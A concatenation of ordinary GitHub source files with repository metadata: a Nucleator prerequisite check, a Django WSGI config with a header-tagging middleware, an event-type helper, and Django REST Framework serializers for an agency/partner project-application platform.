utils.write_err(msg, False)
no_boto = True
except ImportError:
no_boto=True
msg="Prerequisite boto not found.\nNucleator requires boto to run. " \
"You can install it via:\n" \
"\tpip install boto"
utils.write_err(msg, False)
if no_ansible or no_aws or no_boto or no_paramiko or no_yaml or no_jinja2 or no_httplib2:
utils.write_err("Missing pre-requisite, exiting")
# Create the singleton for auto-discovery
command = Init()
|
{
"content_hash": "5f7f29cf34dec41e564fbfc9a0236285",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 175,
"avg_line_length": 37.74074074074074,
"alnum_prop": 0.5806813402495443,
"repo_name": "47lining/nucleator-core",
"id": "698fb730c725bf20ea1c8bb261d23fc7a279cda8",
"size": "7711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/nucleator/core/init/commands/init.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "159399"
},
{
"name": "Ruby",
"bytes": "3268"
}
],
"symlink_target": ""
}
|
"""
WSGI config for newdjangosite project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "newdjangosite.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "newdjangosite.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
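# A minimal sketch of custom WSGI middleware: a pass-through wrapper that tags
# every response; the header name below is a placeholder example. Uncomment the
# last line to enable it.
class ResponseTaggingMiddleware(object):
    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        def tagging_start_response(status, headers, exc_info=None):
            # Append a custom header before delegating to the real start_response.
            headers = list(headers) + [("X-Served-By", "newdjangosite")]
            return start_response(status, headers, exc_info)
        return self.app(environ, tagging_start_response)

# application = ResponseTaggingMiddleware(application)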
|
{
"content_hash": "501845d1daccebdbc8c21e8e77967098",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 45,
"alnum_prop": 0.7958333333333333,
"repo_name": "kbarnes3/BaseDjangoSite",
"id": "e02d1ac5dcf9ed7878ebb9fbdfb2a50c8164de95",
"size": "1440",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/newdjangosite/wsgi.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "1184"
},
{
"name": "HTML",
"bytes": "9955"
},
{
"name": "PowerShell",
"bytes": "5583"
},
{
"name": "Python",
"bytes": "42152"
},
{
"name": "Shell",
"bytes": "1090"
}
],
"symlink_target": ""
}
|
from django.conf import settings
class EventType:
"""
Helper class to define types of events. See .model.Event.type.
"""
def __init__(self, db_value, human_readable_value,
human_readable_value_plural=None,
css_class_name_suffix='primary'):
self.db_value = db_value
self.human_readable_value = human_readable_value
self.human_readable_value_plural = (
human_readable_value_plural or human_readable_value + 's')
self.css_class_name = 'event-{}'.format(css_class_name_suffix)
@property
def choices(self):
"""
Returns a tuple that can be used for Django model field choices
entries.
"""
return self.db_value, self.human_readable_value
@property
def data(self):
return {
'db_value': self.db_value,
'human_readable_value': self.human_readable_value,
'human_readable_value_plural': self.human_readable_value_plural,
'css_class_name': self.css_class_name,
}
@classmethod
def get_all(cls):
"""
Returns an iterable of all event types that are configured in the
settings (EVENT_TYPES). The result can be used in the API.
"""
return (event_type.data for event_type in settings.EVENT_TYPES)
@classmethod
def get_all_choices(cls):
"""
Returns an iterable of all event types that are configured in the
settings (EVENT_TYPES). The result can be used for Django model
field choices.
"""
return (event_type.choices for event_type in settings.EVENT_TYPES)
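# A minimal usage sketch; the event types below are placeholder examples of what
# settings.EVENT_TYPES could contain.
if __name__ == '__main__':
    EVENT_TYPES = (
        EventType('service', 'Service', css_class_name_suffix='primary'),
        EventType('concert', 'Concert', css_class_name_suffix='info'),
    )
    print([event_type.choices for event_type in EVENT_TYPES])
    # -> [('service', 'Service'), ('concert', 'Concert')]
    print(EVENT_TYPES[0].data['css_class_name'])  # -> 'event-primary'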
|
{
"content_hash": "88a5567f4fb0e94421d0d34146c6fbf2",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 76,
"avg_line_length": 33.91836734693877,
"alnum_prop": 0.6089049338146811,
"repo_name": "normanjaeckel/DreifaltigkeitHomepage",
"id": "8ff03cbc58a0277a7fcaf19aaa24807ddbca3453",
"size": "1662",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dreifaltigkeithomepage/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "902"
},
{
"name": "CoffeeScript",
"bytes": "14118"
},
{
"name": "HTML",
"bytes": "5329"
},
{
"name": "JavaScript",
"bytes": "641"
},
{
"name": "Python",
"bytes": "29040"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from collections import defaultdict
from datetime import datetime, date
from django.db import transaction
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from rest_framework.fields import CurrentUserDefault
from account.models import User
from account.serializers import IDUserSerializer, BasicUserSerializer
from agency.agencies import UNHCR
from agency.serializers import AgencySerializer, AgencyUserListSerializer
from common.consts import (
APPLICATION_STATUSES,
CFEI_TYPES,
CFEI_STATUSES,
DIRECT_SELECTION_SOURCE,
COMPLETED_REASON,
ALL_COMPLETED_REASONS,
OTHER_AGENCIES_DSR_COMPLETED_REASONS,
UNHCR_DSR_COMPLETED_REASONS,
)
from common.utils import get_countries_code_from_queryset, update_m2m_relation
from common.serializers import (
SimpleSpecializationSerializer,
PointSerializer,
CommonFileSerializer,
MixinPreventManyCommonFile,
)
from common.models import Point, Specialization
from notification.consts import NotificationType
from notification.helpers import user_received_notification_recently, send_notification_to_cfei_focal_points
from partner.serializers import PartnerSerializer, PartnerAdditionalSerializer, PartnerShortSerializer, \
PartnerSimpleSerializer
from partner.models import Partner
from project.identifiers import get_eoi_display_identifier
from project.models import EOI, Application, Assessment, ApplicationFeedback, EOIAttachment, \
ClarificationRequestQuestion, ClarificationRequestAnswerFile
from project.utilities import update_cfei_focal_points, update_cfei_reviewers
class EOIAttachmentSerializer(serializers.ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
file = CommonFileSerializer()
class Meta:
model = EOIAttachment
fields = (
'id',
'created_by',
'description',
'file',
)
class BaseProjectSerializer(serializers.ModelSerializer):
specializations = SimpleSpecializationSerializer(many=True)
agency = AgencySerializer()
created = serializers.SerializerMethodField()
country_code = serializers.SerializerMethodField()
focal_points = BasicUserSerializer(read_only=True, many=True)
class Meta:
model = EOI
fields = (
'id',
'displayID',
'title',
'created',
'country_code',
'specializations',
'agency',
'start_date',
'end_date',
'deadline_date',
'status',
'completed_date',
'focal_points',
)
def get_created(self, obj):
return obj.created.date()
def get_country_code(self, obj):
return get_countries_code_from_queryset(obj.locations)
class ApplicationsPartnerStatusSerializer(serializers.ModelSerializer):
legal_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'legal_name',
'partner_additional',
'application_status',
'application_status_display',
)
class DirectProjectSerializer(BaseProjectSerializer):
invited_partners = serializers.SerializerMethodField()
partner_offer_status = serializers.SerializerMethodField()
selected_source_display = serializers.CharField(source='get_selected_source_display', read_only=True)
class Meta:
model = EOI
fields = (
'id',
'title',
'created',
'country_code',
'specializations',
'agency',
'invited_partners',
'start_date',
'end_date',
'deadline_date',
'status',
'selected_source',
'selected_source_display',
'partner_offer_status',
)
def get_invited_partners(self, obj):
return obj.invited_partners.values_list('legal_name', flat=True)
def get_partner_offer_status(self, obj):
queryset = Application.objects.filter(eoi=obj)
return ApplicationsPartnerStatusSerializer(queryset, many=True).data
class CreateEOISerializer(serializers.ModelSerializer):
locations = PointSerializer(many=True)
attachments = EOIAttachmentSerializer(many=True, required=False)
def validate(self, attrs):
validated_data = super(CreateEOISerializer, self).validate(attrs)
date_field_names_that_should_be_in_this_order = [
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'start_date',
'end_date',
]
dates = []
for field_name in date_field_names_that_should_be_in_this_order:
dates.append(validated_data.get(field_name))
dates = list(filter(None, dates))
if not dates == sorted(dates):
raise serializers.ValidationError('Dates for the project must be in chronological order.')
today = date.today()
if not all([d >= today for d in dates]):
raise serializers.ValidationError('Dates for the project cannot be set in the past.')
validated_data['displayID'] = get_eoi_display_identifier(
validated_data['agency'].name, validated_data['locations'][0]['admin_level_1']['country_code']
)
if len(validated_data.get('attachments', [])) > 5:
raise serializers.ValidationError({
'attachments': 'Maximum of 5 attachments is allowed.'
})
return validated_data
class Meta:
model = EOI
exclude = ('cn_template', )
extra_kwargs = {
'clarification_request_deadline_date': {
'required': True,
},
'deadline_date': {
'required': True,
},
'notif_results_date': {
'required': True,
},
}
class CreateDirectEOISerializer(CreateEOISerializer):
class Meta:
model = EOI
exclude = ('cn_template', 'deadline_date', 'clarification_request_deadline_date')
class CreateDirectApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = Application
exclude = ("cn", "eoi", "agency", "submitter")
def validate_partner(self, partner):
if partner.is_hq:
raise ValidationError('HQs of International partners are not eligible for Direct Selections / Retention.')
if partner.is_locked:
raise ValidationError('Partner account has been locked and is no longer eligible for selection.')
if partner.has_red_flag:
raise ValidationError('Partner accounts with red flags are not eligible for selection.')
return partner
class CreateDirectApplicationNoCNSerializer(CreateDirectApplicationSerializer):
class Meta:
model = Application
exclude = ("cn", )
read_only_fields = ('submitter', 'eoi', 'agency',)
class ApplicationPartnerSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ('id', 'cn', 'created')
class ProposalEOIDetailsSerializer(serializers.Serializer):
specializations = serializers.SerializerMethodField()
title = serializers.CharField()
def get_specializations(self, obj):
return SimpleSpecializationSerializer(
Specialization.objects.filter(id__in=obj.get('specializations')), many=True
).data
class PartnerApplicationSerializer(MixinPreventManyCommonFile, serializers.ModelSerializer):
cn = CommonFileSerializer()
agency = AgencySerializer(read_only=True)
decision_date = serializers.DateField(source='partner_decision_date', read_only=True)
proposal_of_eoi_details = ProposalEOIDetailsSerializer(read_only=True)
locations_proposal_of_eoi = PointSerializer(many=True, read_only=True)
class Meta:
model = Application
editable_fields = (
'did_accept',
'did_decline',
'cn',
)
read_only_fields = (
'id',
'status',
'created',
'agency',
'did_win',
'did_withdraw',
'decision_date',
'is_published',
'published_timestamp',
'cfei_type',
'application_status',
'application_status_display',
'proposal_of_eoi_details',
'locations_proposal_of_eoi',
'is_unsolicited',
)
fields = editable_fields + read_only_fields
prevent_keys = ["cn"]
class ApplicationFullSerializer(serializers.ModelSerializer):
cn = CommonFileSerializer()
eoi_id = serializers.IntegerField(write_only=True)
partner = PartnerSerializer(read_only=True)
agency = AgencySerializer(read_only=True)
proposal_of_eoi_details = ProposalEOIDetailsSerializer(read_only=True)
locations_proposal_of_eoi = PointSerializer(many=True, read_only=True)
submitter = BasicUserSerializer(read_only=True, default=serializers.CurrentUserDefault())
is_direct = serializers.SerializerMethodField()
cfei_type = serializers.CharField(read_only=True)
application_status = serializers.CharField(read_only=True)
application_status_display = serializers.CharField(read_only=True)
assessments_is_completed = serializers.NullBooleanField(read_only=True)
assessments_marked_as_completed = serializers.NullBooleanField(read_only=True)
decision_date = serializers.DateField(source='partner_decision_date', read_only=True)
agency_decision_maker = BasicUserSerializer(read_only=True)
partner_decision_maker = BasicUserSerializer(read_only=True)
class Meta:
model = Application
exclude = (
'accept_notification',
)
read_only_fields = (
'cn',
'eoi',
'agency_decision_date',
'partner_decision_date',
'did_accept',
'did_decline',
)
def get_is_direct(self, obj):
return obj.eoi_converted is not None
def validate(self, data):
if isinstance(self.instance, Application):
app = self.instance
allowed_to_modify_status = list(app.eoi.focal_points.values_list('id', flat=True)) + [app.eoi.created_by_id]
if data.get("status") and self.context['request'].user.id not in allowed_to_modify_status:
raise serializers.ValidationError(
"Only Focal Point/Creator is allowed to pre-select/reject an application."
)
if data.get("status") == APPLICATION_STATUSES.rejected and \
Assessment.objects.filter(application=app).exists():
raise serializers.ValidationError("Since assessment has begun, application can't be rejected.")
if data.get("status") == APPLICATION_STATUSES.recommended:
if not app.status == APPLICATION_STATUSES.preselected:
raise serializers.ValidationError('Only Preselected applications can be recommended.')
if not app.assessments_is_completed:
raise serializers.ValidationError(
'Cannot recommend application before all assessments have been completed.'
)
if app.eoi.is_completed:
raise serializers.ValidationError("Since CFEI is completed, modification is forbidden.")
if data.get("did_win"):
if not app.eoi.review_summary_comment:
raise serializers.ValidationError({
'review_summary_comment': 'Review summary needs to be filled in before picking a winner.'
})
if not app.partner.is_verified:
raise serializers.ValidationError(
"You cannot award an application if the profile has not been verified yet."
)
if app.partner.has_red_flag:
raise serializers.ValidationError("You cannot award an application if the profile has red flag.")
if not app.assessments_is_completed:
raise serializers.ValidationError(
"You cannot award an application if all assessments have not been added for the application."
)
return super(ApplicationFullSerializer, self).validate(data)
def update(self, instance, validated_data):
if 'status' in validated_data:
with transaction.atomic():
eoi = EOI.objects.select_for_update().get(pk=instance.eoi_id)
preselected_partners = set(eoi.preselected_partners)
if validated_data['status'] in {APPLICATION_STATUSES.preselected, APPLICATION_STATUSES.recommended}:
preselected_partners.add(instance.partner_id)
else:
preselected_partners.discard(instance.partner_id)
eoi.preselected_partners = list(preselected_partners)
eoi.save()
return super(ApplicationFullSerializer, self).update(instance, validated_data)
class ApplicationFullEOISerializer(ApplicationFullSerializer):
eoi = BaseProjectSerializer(read_only=True)
eoi_applications_count = serializers.SerializerMethodField(allow_null=True, read_only=True)
def get_eoi_applications_count(self, application):
return application.eoi and application.eoi.applications.count()
class ManageUCNSerializer(MixinPreventManyCommonFile, serializers.Serializer):
id = serializers.CharField(source="pk", read_only=True)
locations = PointSerializer(many=True, source='locations_proposal_of_eoi')
title = serializers.CharField(source='proposal_of_eoi_details.title')
agency = serializers.CharField(source='agency.id')
specializations = serializers.ListField(source='proposal_of_eoi_details.specializations')
cn = CommonFileSerializer()
prevent_keys = ["cn"]
@transaction.atomic
def create(self, validated_data):
self.prevent_many_common_file_validator(validated_data)
partner = self.context['request'].active_partner
locations = validated_data.pop('locations_proposal_of_eoi', [])
agency = validated_data.pop('agency')
app = Application.objects.create(
is_unsolicited=True,
is_published=False,
partner_id=partner.id,
eoi=None,
agency_id=agency['id'],
submitter=self.context['request'].user,
status=APPLICATION_STATUSES.pending,
proposal_of_eoi_details=validated_data['proposal_of_eoi_details'],
cn=validated_data['cn'],
)
for location in locations:
point = Point.objects.get_point(**location)
app.locations_proposal_of_eoi.add(point)
return app
@transaction.atomic
def update(self, instance, validated_data):
self.prevent_many_common_file_validator(validated_data)
instance.agency_id = validated_data.get('agency', {}).get('id') or instance.agency_id
instance.proposal_of_eoi_details = validated_data.get(
'proposal_of_eoi_details'
) or instance.proposal_of_eoi_details
instance.cn = validated_data.get('cn') or instance.cn
locations_data = self.initial_data.get('locations', [])
if locations_data:
instance.locations_proposal_of_eoi.clear()
for location_data in locations_data:
location_serializer = PointSerializer(data=location_data)
location_serializer.is_valid(raise_exception=True)
instance.locations_proposal_of_eoi.add(location_serializer.save())
instance.save()
return instance
class CreateDirectProjectSerializer(serializers.Serializer):
eoi = CreateDirectEOISerializer()
applications = CreateDirectApplicationNoCNSerializer(many=True)
def validate(self, attrs):
validated_data = super(CreateDirectProjectSerializer, self).validate(attrs)
if len(validated_data['applications']) > 1:
raise serializers.ValidationError({
'applications': 'Only one application is allowed for DSR'
})
return validated_data
@transaction.atomic
def create(self, validated_data):
locations = validated_data['eoi'].pop('locations')
specializations = validated_data['eoi'].pop('specializations')
focal_points = validated_data['eoi'].pop('focal_points')
attachments = validated_data['eoi'].pop('attachments', [])
validated_data['eoi']['display_type'] = CFEI_TYPES.direct
eoi = EOI.objects.create(**validated_data['eoi'])
for location in locations:
point = Point.objects.get_point(**location)
eoi.locations.add(point)
for specialization in specializations:
eoi.specializations.add(specialization)
for attachment_data in attachments:
attachment_data['eoi'] = eoi
EOIAttachment.objects.create(**attachment_data)
applications = []
for application_data in validated_data['applications']:
application = Application.objects.create(
partner=application_data['partner'],
eoi=eoi,
agency=eoi.agency,
submitter=validated_data['eoi']['created_by'],
status=APPLICATION_STATUSES.pending,
did_win=True,
ds_justification_select=application_data['ds_justification_select'],
justification_reason=application_data['justification_reason'],
ds_attachment=application_data.get('ds_attachment'),
)
applications.append(application)
update_cfei_focal_points(eoi, [f.id for f in focal_points])
return {
"eoi": eoi,
"applications": applications,
}
class CreateProjectSerializer(CreateEOISerializer):
class Meta(CreateEOISerializer.Meta):
model = EOI
exclude = CreateEOISerializer.Meta.exclude + (
'created_by',
)
@transaction.atomic
def create(self, validated_data):
locations = validated_data.pop('locations')
specializations = validated_data.pop('specializations')
focal_points = validated_data.pop('focal_points')
attachments = validated_data.pop('attachments', [])
validated_data['cn_template'] = validated_data['agency'].profile.eoi_template
validated_data['created_by'] = self.context['request'].user
self.instance = EOI.objects.create(**validated_data)
for location in locations:
point = Point.objects.get_point(**location)
self.instance.locations.add(point)
for specialization in specializations:
self.instance.specializations.add(specialization)
for focal_point in focal_points:
self.instance.focal_points.add(focal_point)
for attachment_data in attachments:
attachment_data['eoi'] = self.instance
EOIAttachment.objects.create(**attachment_data)
send_notification_to_cfei_focal_points(self.instance)
return self.instance
class SelectedPartnersSerializer(serializers.ModelSerializer):
partner_id = serializers.CharField(source="partner.id")
partner_name = serializers.CharField(source="partner.legal_name")
partner_is_verified = serializers.NullBooleanField(source="partner.is_verified")
application_status_display = serializers.CharField(read_only=True)
partner_profile_is_complete = serializers.BooleanField(read_only=True, source='partner.profile_is_complete')
class Meta:
model = Application
fields = (
'id',
'partner_id',
'partner_name',
'partner_is_verified',
'partner_profile_is_complete',
'application_status',
'application_status_display',
)
class SelectedPartnersJustificationSerializer(SelectedPartnersSerializer):
ds_attachment = CommonFileSerializer(read_only=True)
class Meta(SelectedPartnersSerializer.Meta):
fields = SelectedPartnersSerializer.Meta.fields + (
'ds_justification_select',
'justification_reason',
'ds_attachment',
)
class PartnerProjectSerializer(serializers.ModelSerializer):
agency = serializers.CharField(source='agency.name')
specializations = SimpleSpecializationSerializer(many=True)
locations = PointSerializer(many=True)
is_pinned = serializers.SerializerMethodField()
application = serializers.SerializerMethodField()
attachments = EOIAttachmentSerializer(many=True, read_only=True)
# TODO - cut down on some of these fields. partners should not get back this data
# Frontend currently breaks if doesn't receive all
class Meta:
model = EOI
fields = (
'id',
'displayID',
'specializations',
'locations',
'assessments_criteria',
'created',
'start_date',
'end_date',
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'justification',
'completed_reason',
'completed_date',
'is_completed',
'display_type',
'status',
'title',
'agency',
'agency_office',
'cn_template',
'description',
'goal',
'other_information',
'has_weighting',
'selected_source',
'is_pinned',
'application',
'published_timestamp',
'deadline_passed',
'clarification_request_deadline_passed',
'attachments',
'population',
)
read_only_fields = fields
def get_is_pinned(self, obj):
return obj.pins.filter(partner=self.context['request'].active_partner.id).exists()
def get_application(self, obj):
qs = obj.applications.filter(partner=self.context['request'].active_partner.id)
if qs.exists():
return ApplicationPartnerSerializer(qs.get()).data
return None
class AgencyProjectSerializer(serializers.ModelSerializer):
specializations = SimpleSpecializationSerializer(many=True, read_only=True)
locations = PointSerializer(many=True, read_only=True)
direct_selected_partners = serializers.SerializerMethodField()
focal_points_detail = BasicUserSerializer(source='focal_points', read_only=True, many=True)
reviewers_detail = BasicUserSerializer(source='reviewers', read_only=True, many=True)
invited_partners = PartnerShortSerializer(many=True, read_only=True)
applications_count = serializers.SerializerMethodField(allow_null=True, read_only=True)
attachments = EOIAttachmentSerializer(many=True, read_only=True)
current_user_finished_reviews = serializers.SerializerMethodField(allow_null=True, read_only=True)
current_user_marked_reviews_completed = serializers.SerializerMethodField(allow_null=True, read_only=True)
winning_partners = PartnerSimpleSerializer(many=True, allow_null=True)
class Meta:
model = EOI
fields = (
'id',
'displayID',
'specializations',
'invited_partners',
'locations',
'assessments_criteria',
'created',
'start_date',
'end_date',
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'justification',
'completed_reason',
'completed_reason_display',
'completed_retention',
'completed_comment',
'completed_date',
'is_completed',
'display_type',
'status',
'title',
'agency',
'created_by',
'focal_points',
'focal_points_detail',
'agency_office',
'cn_template',
'description',
'goal',
'other_information',
'has_weighting',
'reviewers',
'reviewers_detail',
'selected_source',
'direct_selected_partners',
'created',
'contains_partner_accepted',
'applications_count',
'is_published',
'deadline_passed',
'clarification_request_deadline_passed',
'published_timestamp',
'attachments',
'sent_for_decision',
'current_user_finished_reviews',
'current_user_marked_reviews_completed',
'assessments_marked_as_completed',
'contains_recommended_applications',
'winning_partners',
'population',
)
read_only_fields = (
'created',
'completed_date',
'is_published',
'published_timestamp',
'displayID',
'sent_for_decision',
)
def get_extra_kwargs(self):
extra_kwargs = super(AgencyProjectSerializer, self).get_extra_kwargs()
if self.instance and isinstance(self.instance, EOI):
if not self.instance.is_direct:
completed_reason_choices = COMPLETED_REASON
elif self.instance.agency.name == UNHCR.name:
completed_reason_choices = UNHCR_DSR_COMPLETED_REASONS
else:
completed_reason_choices = OTHER_AGENCIES_DSR_COMPLETED_REASONS
extra_kwargs['completed_reason'] = {
'choices': completed_reason_choices
}
return extra_kwargs
def get_direct_selected_partners(self, obj):
if obj.is_direct:
request = self.context.get('request')
if obj.is_completed or request and request.agency_member.office.agency == obj.agency:
serializer_class = SelectedPartnersJustificationSerializer
else:
serializer_class = SelectedPartnersSerializer
return serializer_class(obj.applications.all(), many=True).data
def get_applications_count(self, eoi):
return eoi.applications.count()
def get_current_user_finished_reviews(self, eoi):
request = self.context.get('request')
user = request and request.user
if user and eoi.reviewers.filter(id=user.id).exists():
applications = eoi.applications.filter(status=APPLICATION_STATUSES.preselected)
return applications.count() == user.assessments.filter(application__in=applications).count()
def get_current_user_marked_reviews_completed(self, eoi):
request = self.context.get('request')
user = request and request.user
if user and eoi.reviewers.filter(id=user.id).exists():
applications = eoi.applications.filter(status=APPLICATION_STATUSES.preselected)
return applications.count() == user.assessments.filter(application__in=applications, completed=True).count()
@transaction.atomic
def update(self, eoi: EOI, validated_data):
if eoi.status == CFEI_STATUSES.closed and not set(validated_data.keys()).issubset(
{'reviewers', 'focal_points', 'completed_reason', 'justification'}
):
raise serializers.ValidationError(
"Since CFEI deadline is passed, You can only modify reviewer(s) and/or focal point(s)."
)
completed_reason = validated_data.get('completed_reason')
if completed_reason:
if not validated_data.get('justification'):
raise serializers.ValidationError({
'justification': 'This field is required'
})
if completed_reason == ALL_COMPLETED_REASONS.accepted_retention and not validated_data.get(
'completed_retention'
):
raise serializers.ValidationError({
'completed_retention': 'This field is required'
})
if completed_reason in {
COMPLETED_REASON.partners,
ALL_COMPLETED_REASONS.accepted,
ALL_COMPLETED_REASONS.accepted_retention,
} and not eoi.contains_partner_accepted:
raise serializers.ValidationError({
'completed_reason': f"You've selected '{ALL_COMPLETED_REASONS[completed_reason]}' as "
f"finalize resolution, but no partners have accepted."
})
has_just_been_completed = all([
eoi.completed_reason is None,
validated_data.get('completed_reason'),
eoi.completed_date is None,
eoi.is_completed is False
])
if has_just_been_completed:
eoi.completed_date = datetime.now()
eoi.is_completed = True
eoi = super(AgencyProjectSerializer, self).update(eoi, validated_data)
invited_partners = self.initial_data.get('invited_partners', [])
if invited_partners:
invited_partner_ids = [p['id'] for p in invited_partners]
eoi.invited_partners.through.objects.filter(eoi_id=eoi.id).exclude(
partner_id__in=invited_partner_ids
).delete()
eoi.invited_partners.add(*Partner.objects.filter(id__in=invited_partner_ids))
elif 'invited_partners' in self.initial_data:
eoi.invited_partners.clear()
specialization_ids = self.initial_data.get('specializations', [])
if specialization_ids:
eoi.specializations.through.objects.filter(eoi_id=eoi.id).exclude(
specialization_id__in=specialization_ids
).delete()
eoi.specializations.add(*Specialization.objects.filter(id__in=specialization_ids))
locations_data = self.initial_data.get('locations', [])
if locations_data:
eoi.locations.clear()
for location_data in locations_data:
location_serializer = PointSerializer(data=location_data)
location_serializer.is_valid(raise_exception=True)
eoi.locations.add(location_serializer.save())
update_cfei_reviewers(eoi, self.initial_data.get('reviewers'))
update_cfei_focal_points(eoi, self.initial_data.get('focal_points'))
update_m2m_relation(
eoi,
'attachments',
self.initial_data.get('attachments'),
EOIAttachmentSerializer,
context=self.context,
save_kwargs={
'eoi': eoi
}
)
if eoi.is_direct and self.initial_data.get('applications'):
# DSRs should only have 1 application
application_data = self.initial_data.get('applications')[0]
serializer = CreateDirectApplicationNoCNSerializer(
instance=eoi.applications.first(),
data=application_data,
partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return eoi
def validate(self, data):
assessments_criteria = data.get('assessments_criteria', [])
has_weighting = data.get('has_weighting', False)
if has_weighting is True and all(map(lambda x: 'weight' in x, assessments_criteria)) is False:
raise serializers.ValidationError(
"Weight criteria must be provided since `has_weighting` is selected."
)
elif has_weighting is False and any(map(lambda x: 'weight' in x, assessments_criteria)) is True:
raise serializers.ValidationError(
"Weight criteria should not be provided since `has_weighting` is unselected."
)
return super(AgencyProjectSerializer, self).validate(data)
class SimpleAssessmentSerializer(serializers.ModelSerializer):
reviewer_fullname = serializers.CharField(source='reviewer.fullname')
total_score = serializers.IntegerField()
class Meta:
model = Assessment
fields = (
'reviewer_fullname',
'note',
'total_score',
)
read_only_fields = fields
class ApplicationsListSerializer(serializers.ModelSerializer):
legal_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
type_org = serializers.CharField(source="partner.display_type")
cn = CommonFileSerializer()
your_score = serializers.SerializerMethodField()
your_score_breakdown = serializers.SerializerMethodField()
review_progress = serializers.SerializerMethodField()
assessments_completed = serializers.SerializerMethodField()
application_status_display = serializers.CharField(read_only=True)
assessments = SimpleAssessmentSerializer(many=True, read_only=True)
completed_assessments_count = serializers.SerializerMethodField()
average_scores = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'id',
'legal_name',
'partner_additional',
'type_org',
'status',
'cn',
'average_total_score',
'your_score',
'your_score_breakdown',
'review_progress',
'application_status_display',
'assessments',
'completed_assessments_count',
'average_scores',
'did_accept',
'did_decline',
'did_win',
'did_withdraw',
'assessments_completed',
)
def _get_review_reviewers_count(self, app):
return app.assessments.count(), app.eoi.reviewers.count()
def _get_my_assessment(self, obj):
assess_qs = obj.assessments.filter(reviewer=self.context['request'].user)
if assess_qs.exists():
return assess_qs.first()
return None
def get_your_score(self, obj):
my_assessment = self._get_my_assessment(obj)
return my_assessment.total_score if my_assessment else None
def get_your_score_breakdown(self, obj):
my_assessment = self._get_my_assessment(obj)
return my_assessment.get_scores_as_dict() if my_assessment else None
def get_review_progress(self, obj):
return '{}/{}'.format(*self._get_review_reviewers_count(obj))
def get_assessments_completed(self, obj):
return obj.eoi.reviewers.count() == self.get_completed_assessments_count(obj)
def get_completed_assessments_count(self, obj):
return obj.assessments.filter(completed=True).count()
def get_average_scores(self, obj):
scores = defaultdict(int)
total = 0
for assessment in obj.assessments.filter(completed=True):
for score in assessment.scores:
scores[score['selection_criteria']] += score['score']
total += 1
if not total:
return {}
return {
k: v / total for k, v in scores.items()
}
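# Illustrative sketch, not part of the original serializer: how get_average_scores()
# above aggregates — sum each criterion's score over completed assessments, then
# divide by the number of completed assessments. Plain dicts stand in for Assessment rows.
def _average_scores_example(completed_assessments):
    scores, total = defaultdict(int), 0
    for assessment in completed_assessments:
        for score in assessment['scores']:
            scores[score['selection_criteria']] += score['score']
        total += 1
    return {k: v / total for k, v in scores.items()} if total else {}
# _average_scores_example([
#     {'scores': [{'selection_criteria': 'SEE', 'score': 8}]},
#     {'scores': [{'selection_criteria': 'SEE', 'score': 6}]},
# ]) == {'SEE': 7.0}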
class ReviewersApplicationSerializer(serializers.ModelSerializer):
assessment = serializers.SerializerMethodField(read_only=True)
class Meta:
model = User
fields = (
'id',
'fullname',
'assessment',
)
def get_assessment(self, obj):
application_id = self.context['request'].parser_context['kwargs']['application_id']
assessment = Assessment.objects.filter(application=application_id, reviewer=obj)
return ReviewerAssessmentsSerializer(assessment, many=True).data
class ReviewerAssessmentsSerializer(serializers.ModelSerializer):
total_score = serializers.IntegerField(read_only=True)
reviewer = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
modified_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
class Meta:
model = Assessment
fields = (
'id',
'reviewer',
'created_by',
'modified_by',
'application',
'scores',
'total_score',
'date_reviewed',
'is_a_committee_score',
'note',
'completed',
'completed_date',
)
read_only_fields = (
'created_by', 'modified_by', 'completed', 'completed_date',
)
def get_extra_kwargs(self):
extra_kwargs = super(ReviewerAssessmentsSerializer, self).get_extra_kwargs()
if self.instance:
extra_kwargs['application'] = {
'read_only': True
}
return extra_kwargs
def validate(self, data):
kwargs = self.context['request'].parser_context.get('kwargs', {})
